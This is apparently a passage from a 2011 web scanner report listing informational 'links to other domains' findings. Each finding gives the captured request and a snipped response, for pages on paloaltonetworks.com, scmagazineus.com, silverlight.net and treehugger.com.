Cookie: 375dab189ae785dd86afe53226bc8ecd=d48b5b854478fe967f99103e7fac9089

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 12:19:28 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 23 Jul 2011 12:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lawyers ... NJ, NY
...[SNIP]...
</div><script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js'></script>
...[SNIP]...
<br /> <a href="http://meritas.org/" target="_blank"><img src="/images/icons/icon-reflect-meritas.png" border="0" alt="MERITAS Worldwide" width="174" height="114" alt="Join a Lawyers Group" />
...[SNIP]...

18.185. http://www.paloaltonetworks.com/cam/switch/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paloaltonetworks.com
Path:	/cam/switch/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag

The response contains the following links to other domains:

http://ad.retargeter.com/seg?add=58218&t=2
http://paloaltonetworks.etrigue.com/cas/esp/script.asp?id=70554
http://t3.trackalyzer.com/trackalyze.js
http://twitthis.com/twit?url=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag
http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag
http://www.google-analytics.com/urchin.js
http://www.linkedin.com/shareArticle?mini=true&url=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag

Request

GET /cam/switch/index.php?ts=scmag HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Jul 2011 20:15:08 GMT
Connection: Keep-Alive
Content-Length: 8158

<!DOCTYPE html>

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<li class="fb"><a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag" title="Facebook" target="_blank">Facebook</a>
...[SNIP]...
<li class="tw"><a href="http://twitthis.com/twit?url=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag" title="Twitter" target="_blank">Twitter</a>
...[SNIP]...
<li class="lk"><a href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag" title="LinkedIn" target="_blank">LinkedIn</a>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t3.trackalyzer.com/trackalyze.js"></script>

   
   <script language="javascript" type="text/javascript" src="http://paloaltonetworks.etrigue.com/cas/esp/script.asp?id=70554"></script>

   
   <img src="http://ad.retargeter.com/seg?add=58218&t=2" width="1" height="1" />

   
...[SNIP]...

18.186. http://www.scmagazineus.com/js/scripts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/js/scripts.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.scmagazineus.com/js/scripts.js?4220166151

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /js/scripts.js?4220166151 HTTP/1.1
Host: www.scmagazineus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: ASP.NET_SessionId=lwqoj3yh0qnnva0n4ikj33sk

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 22 Jul 2011 14:30:15 GMT
Accept-Ranges: bytes
ETag: "80f536df7b48cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:13:12 GMT
Content-Length: 10190

var dc_tile=1;
var axel = Math.random() + "";
var ord = axel * 1000000000000000000;

function popWin(url) { // popup script copyright h1Web. We rule all!
w=window.open(url,"w","resizable=1,scrollbars
...[SNIP]...
</a>';
}
else if (google_ads[0].type == "flash") {
s += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' +
' codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"' +
' WIDTH="' + google_ad.image_width +
'" HEIGHT="' + google_ad.image_height + '">' +
'<PARAM NAME="movie" VALUE="' + google_ad.image_url + '">
...[SNIP]...

18.187. http://www.silverlight.net/silverlight-adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/silverlight-adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/silverlight-adchain.html?siteid=2&Task=Get&IFR=True&zoneid=389

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=389&CampaignID=2195&AdvertiserID=62&BannerID=2904&SiteID=2&RandomNumber=902546355&Keywords=
http://ads.asp.net/ads/728x90__WinServerHyper_V_V2_HyperVCloud_3_11_11.gif

Request

GET /silverlight-adchain.html?siteid=2&Task=Get&IFR=True&zoneid=389 HTTP/1.1
Host: www.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getting-started
Cookie: SilverlightFirstVisit3=LastVisited=GettingStarted; omniID=1311396409830_c861_c67b_bd36_91d8c0995578

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 405
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bq5oc0pa3eqbzfbtf13r2r3u; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:46:51 GMT

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=389&CampaignID=2195&AdvertiserID=62&BannerID=2904&SiteID=2&RandomNumber=902546355&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/728x90__WinServerHyper_V_V2_HyperVCloud_3_11_11.gif" width="728" height="90" alt="House Ad - Microsoft" align="Center" border="0"></a>
...[SNIP]...

18.188. http://www.silverlight.net/silverlight-adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/silverlight-adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/silverlight-adchain.html?siteid=2&Task=Get&IFR=True&zoneid=501

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=501&CampaignID=2224&AdvertiserID=2&BannerID=2950&SiteID=2&RandomNumber=1237556216&Keywords=
http://ads.asp.net/ads/1_SL-WPF-DataChart-300x250.jpg

Request

GET /silverlight-adchain.html?siteid=2&Task=Get&IFR=True&zoneid=501 HTTP/1.1
Host: www.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getting-started
Cookie: SilverlightFirstVisit3=LastVisited=GettingStarted; omniID=1311396409830_c861_c67b_bd36_91d8c0995578

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 391
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=txoficb5b4sxvz5gbwvktzil; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:46:51 GMT

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=501&CampaignID=2224&AdvertiserID=2&BannerID=2950&SiteID=2&RandomNumber=1237556216&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/1_SL-WPF-DataChart-300x250.jpg" width="300" height="250" alt="Advertising - Infragistics" align="Center" border="0"></a>
...[SNIP]...

18.189. http://www.treehugger.com/galleries/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/galleries/

Issue detail

The page was loaded from a URL containing a query string:

http://www.treehugger.com/galleries/?campaign=th_nav_galleries

The response contains the following links to other domains:

http://animal.discovery.com/
http://corporate.discovery.com/
http://dhd.discovery.com/
http://discctreehugger.112.2o7.net/b/ss/discctreehugger/1/H.20.3--NS/0
http://dsc.discovery.com/
http://dsc.discovery.com/utilities/about/privacypolicy.html
http://dsc.discovery.com/utilities/about/visitoragreement.html
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/treehuggersite
http://fittv.discovery.com/
http://health.discovery.com/
http://kids.discovery.com/
http://pixel.quantserve.com/pixel/p-eeQ5-n64VG-GM.gif?labels=Treehugger.Slideshows
http://planetgreen.discovery.com/
http://science.discovery.com/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-204250h&cg=0&cc=1&ts=noscript
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://sm6.sitemeter.com/meter.asp?site=sm6damnhippy
http://sm6.sitemeter.com/stats.asp?site=sm6damnhippy
http://times.discovery.com/
http://tlc.discovery.com/
http://turbo.discovery.com/
http://twitter.com/th_rss
http://twitter.com/treehugger
http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0
http://www.google-analytics.com/urchin.js
http://www.howstuffworks.com/
http://www.omniture.com/
http://www.petfinder.com/

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:43:22 GMT
Content-Length: 26383
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script><noscript><img src="http://pixel.quantserve.com/pixel/p-eeQ5-n64VG-GM.gif?labels=Treehugger.Slideshows" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></noscript><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy"></script><noscript><a href="http://sm6.sitemeter.com/stats.asp?site=sm6damnhippy" target="_top"><img src="http://sm6.sitemeter.com/meter.asp?site=sm6damnhippy" alt="Site Meter" border="0"/></a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://discctreehugger.112.2O7.net/b/ss/discctreehugger/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<div class="small-footer">
© TreeHugger.com 2011 |
<a href="http://dsc.discovery.com/utilities/about/visitoragreement.html">Visitor Agreement</a> |
<a href="http://dsc.discovery.com/utilities/about/privacypolicy.html">Privacy Policy</a> | <a href="http://corporate.discovery.com">Discovery Communications, LLC</a>
...[SNIP]...
</strong> <a href="http://dsc.discovery.com">Discovery Channel</a> | <a href="http://tlc.discovery.com">TLC</a> | <a href="http://animal.discovery.com">Animal Planet</a> | <a href="http://health.discovery.com">Discovery Health</a> | <a href="http://science.discovery.com">Science Channel</a>
...[SNIP]...
<br><a href="http://planetgreen.discovery.com/">Planet Green</a> | <a href="http://www.howstuffworks.com/">HowStuffWorks</a> | <a href="http://times.discovery.com">Discovery Times</a> | <a href="http://kids.discovery.com">Discovery Kids</a> | <a href="http://dhd.discovery.com">HD Theater</a> | <a href="http://fittv.discovery.com">FitTV</a> | <a href="http://www.petfinder.com">Petfinder</a> | <a href="http://turbo.discovery.com">Turbo</a>
...[SNIP]...
<div class="facebook-widget">
<iframe scrolling="no" frameborder="0" src="http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0" allowtransparency="true" style="border: none; width: 200px; height: 260px; padding: 0px; margin: 0px; min-height: 260px;"></iframe>
...[SNIP]...
<li><a href="http://twitter.com/treehugger"><img src="/scripts/slideouttab/redo/twitter.png" />
...[SNIP]...
<li><a href="http://twitter.com/th_rss"><img src="/scripts/slideouttab/redo/th_rss.png" />
...[SNIP]...
<li><a href="http://feeds.feedburner.com/treehuggersite"><img src="/scripts/slideouttab/redo/rss.png" />
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-204250h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

18.190. http://www.treehugger.com/science_technology/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/science_technology/

Issue detail

The page was loaded from a URL containing a query string:

http://www.treehugger.com/science_technology/?campaign=th_nav_scitech

The response contains the following links to other domains:

http://animal.discovery.com/
http://askpablo.org/
http://atlasole.gse.it/atlasole/
http://climate.weather.com/
http://content.dl-rms.com/rms/mother/21163/nodetag.js
http://corporate.discovery.com/
http://corporate.discovery.com/privacy-policy/
http://corporate.discovery.com/visitor-agreement/
http://creativecommons.org/licenses/by-nd/2.0/deed.en
http://creativecommons.org/licenses/by-sa/2.0/
http://creativecommons.org/licenses/by/2.0/
http://dhd.discovery.com/
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&title=Another Reason We Need the Smart Grid: Record Heat
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&title=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&title=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&title=Italy Now in Second Place in World Solar PV Rankings
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&title=Mass Extinctions: Now Easier Than Ever to Trigger!
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&title=Could Mountaintop Removal Sites Power Kentucky With Solar?
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&title=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA
http://discctreehugger.112.2o7.net/b/ss/discctreehugger/1/H.20.3--NS/0
http://dotearth.blogs.nytimes.com/2011/07/19/steve-schneiders-climate-view/
http://dsc.discovery.com/
http://eco.psfk.com/
http://edge.quantserve.com/quant.js
http://en.wikipedia.org/wiki/Blackspot_tuskfish
http://en.wikipedia.org/wiki/Marshall_McLuhan
http://feedproxy.google.com/TreehuggerRadio
http://feeds.feedburner.com/treehugger/itunes
http://feeds.feedburner.com/treehuggersite
http://feeds.feedburner.com/~fc/treehuggersite?bg=00CC00&fg=444444&anim=1
http://fittv.discovery.com/
http://gigaom.com/cleantech/another-reason-we-need-the-smart-grid-record-heat/
http://gristmill.grist.org/
http://health.discovery.com/
http://icompass.insightexpressai.com/549.js
http://itstheenvironmentstupid.blogspot.com/
http://js.revsci.net/gateway/gw.js?csid=J08778
http://kids.discovery.com/
http://lumag.com/
http://news.mongabay.com/2011/0717-hance_fish_tools.html
http://nsidc.org/arcticseaicenews/2011/071811.html
http://ourtomorrow.blogspot.com/
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-eeQ5-n64VG-GM.gif?labels=Treehugger
http://planetgreen.discovery.com/
http://planetgreen.discovery.com/games-quizzes/?campaign=th_nav_quiz
http://planetgreen.discovery.com/games-quizzes/tom-green-quiz-game.html?campaign=th_nav_quiz
http://planetgreen.discovery.com/videos/treehugger-tv/
http://platform.twitter.com/widgets.js
http://player.vimeo.com/video/25752549?title=0&byline=0&portrait=0
http://player.vimeo.com/video/8022406?title=0&byline=0&portrait=0
http://plumgear.com/
http://promote.pair.com/direct.pl?treehugger
http://science.discovery.com/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-204250h&cg=0&cc=1&ts=noscript
http://senseable.mit.edu/backtalk/
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://sm6.sitemeter.com/meter.asp?site=sm6damnhippy
http://sm6.sitemeter.com/stats.asp?site=sm6damnhippy
http://store.discovery.com/?ecid=PRF-TV1-100552&pa=PRF-TV1-100552
http://store.discovery.com/detail.php?p=85651&ecid=PRF-TV1-100594&pa=PRF-TV1-100594
http://sustainablog.org/
http://technorati.com/faves?add=http://www.treehugger.com
http://thinkprogress.org/romm/2011/07/21/275893/500-days-of-summer-were-heat-wave/
http://times.discovery.com/
http://timesonline.typepad.com/eco_worrier/
http://tlc.discovery.com/
http://turbo.discovery.com/
http://twitter.com/th_rss
http://twitter.com/treehugger
http://vimeo.com/
http://vimeo.com/25752549
http://vimeo.com/8022406
http://vimeo.com/user2716120
http://vimeo.com/user7615424
http://web.mit.edu/press/media.html?id=14775
http://www.americanapparel.net/
http://www.columbia.edu/cu/mpaenvironment
http://www.conedsolutions.com/
http://www.coroflot.com/hankukilbo/BIKE-GUIDE
http://www.cpsenergy.com/
http://www.design-niche.com/
http://www.earthtechling.com/tag/concepts/
http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&permalink=1
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&t=Another Reason We Need the Smart Grid: Record Heat
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&t=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&t=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&t=Italy Now in Second Place in World Solar PV Rankings
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&t=Mass Extinctions: Now Easier Than Ever to Trigger!
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&t=Could Mountaintop Removal Sites Power Kentucky With Solar?
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&t=WhichFish.org Lists Fish that are Safe to Eat
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&t=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA
http://www.fishonline.org/
http://www.flickr.com/photos/ajc1/5764344969/
http://www.flickr.com/photos/capnkiddd/3770942054/sizes/m/in/photostream/
http://www.flickr.com/photos/diametrik/354983385/sizes/l/in/photostream/
http://www.flickr.com/photos/gsfc/5937599688/sizes/m/in/photostream/
http://www.flickr.com/photos/imaginecup/5935442924/
http://www.flickr.com/photos/jonezes/4207513228/sizes/m/in/photostream/
http://www.flickr.com/photos/katie_hannan/4127359747/
http://www.flickr.com/photos/markchapmanphoto/4808973092/sizes/m/in/photostream/
http://www.flickr.com/photos/oxfameastafrica/5758400938/sizes/m/in/photostream/
http://www.flickr.com/photos/soggydan/4365687955/sizes/m/in/photostream/
http://www.flickr.com/photos/walmartcorporate/5258813438/sizes/l/in/photostream/
http://www.flickr.com/photos/wonderlane/2316410772/sizes/m/in/photostream/
http://www.google.ca/finance?chdnp=0&chdd=1&chds=1&chdv=1&chvs=Linear&chdeh=0&chfdeh=0&chdet=1311192000000&chddm=391&chls=IntervalBasedLine&q=NASDAQ:TSLA&ntsp=0
http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8
http://www.green-links.org/
http://www.greendrinks.org/
http://www.greenpeace.org/usa/en/campaigns/oceans/seafood/red-fish/
http://www.grist.org/list/2011-07-21-nyc-mayor-bloomberg-gives-50-million-to-fight-coal-michael-bloom
http://www.houseandgarden.com/main/blogs/treehugger
http://www.howstuffworks.com/
http://www.howtosavetheworldforfree.com/
http://www.idealbite.com/blog
http://www.independent.co.uk/environment/climate-change/climate-sceptics-get-too-much-airtime-bbc-told-2317718.html
http://www.lime.com/planet
http://www.mcsuk.org/
http://www.montereybayaquarium.org/
http://www.montereybayaquarium.org/cr/SeafoodWatch/web/sfw_iPhone.aspx
http://www.msnbc.msn.com/id/43455859/ns/us_news-environment/t/safety-rules-loosened-aging-nuclear-reactors/
http://www.natlsolar.com/
http://www.nonscalable.com/
http://www.omniture.com/
http://www.pair.com/
http://www.petfinder.com/
http://www.plentymag.com/
http://www.projectgreenbag.com/
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&title=Another Reason We Need the Smart Grid: Record Heat
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&title=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&title=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&title=Italy Now in Second Place in World Solar PV Rankings
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&title=Mass Extinctions: Now Easier Than Ever to Trigger!
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&title=Could Mountaintop Removal Sites Power Kentucky With Solar?
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&title=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA
http://www.regenensolar.com/RegenEn_Solar.html
http://www.renewableenergyworld.com/rea/news/article/2011/07/50-mw-of-solar-make-that-400
http://www.renewableenergyworld.com/rea/news/article/2011/07/putting-damaged-land-to-good-use
http://www.sheagunther.org/
http://www.simpleshoes.com/
http://www.springer.com/life+sciences/ecology/journal/338
http://www.strategiesforsustainability.blogspot.com/
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&title=Another Reason We Need the Smart Grid: Record Heat
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&title=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&title=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&title=Italy Now in Second Place in World Solar PV Rankings
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&title=Mass Extinctions: Now Easier Than Ever to Trigger!
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&title=Could Mountaintop Removal Sites Power Kentucky With Solar?
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&title=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA
http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton1
http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton2
http://www.suntechnics.com/
http://www.theatlantic.com/business/archive/2011/07/paint-your-roofs-white/241784/
http://www.thevestibules.com/
http://www.totalgeekdom.com/?p=572
http://www.vivavi.com/
http://www.weather.com/blog/weather/8_25097.html
http://www.wind-works.org/FeedLaws/Italy/ItalyPasses7000MWofTotalInstalledSolarPV.html
http://www.youtube.com/embed/6hCRafyV0zI?rel=0
http://www.youtube.com/user/odziz
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:43:22 GMT
Content-Length: 149556
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script><noscript><img src="http://pixel.quantserve.com/pixel/p-eeQ5-n64VG-GM.gif?labels=Treehugger" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></noscript>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://discctreehugger.112.2O7.net/b/ss/discctreehugger/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<script type="text/javascript" src="http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy"></script><noscript><a href="http://sm6.sitemeter.com/stats.asp?site=sm6damnhippy" target="_top"><img src="http://sm6.sitemeter.com/meter.asp?site=sm6damnhippy" alt="Site Meter" border="0"/></a>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8"></script>
...[SNIP]...
<div style="float: right; position:relative; top: -2px; left: 0px;"><a href="http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton1"><img src="/images/stumble-treehugger.png" border="0" title="StumbleThru is a new way to discover the best TreeHugger content as determined by the StumbleUpon community. Click and see what you discover!
...[SNIP]...
<div style="float: right; position:relative; top: -2px; left: 0px; margin-right: 5px;">
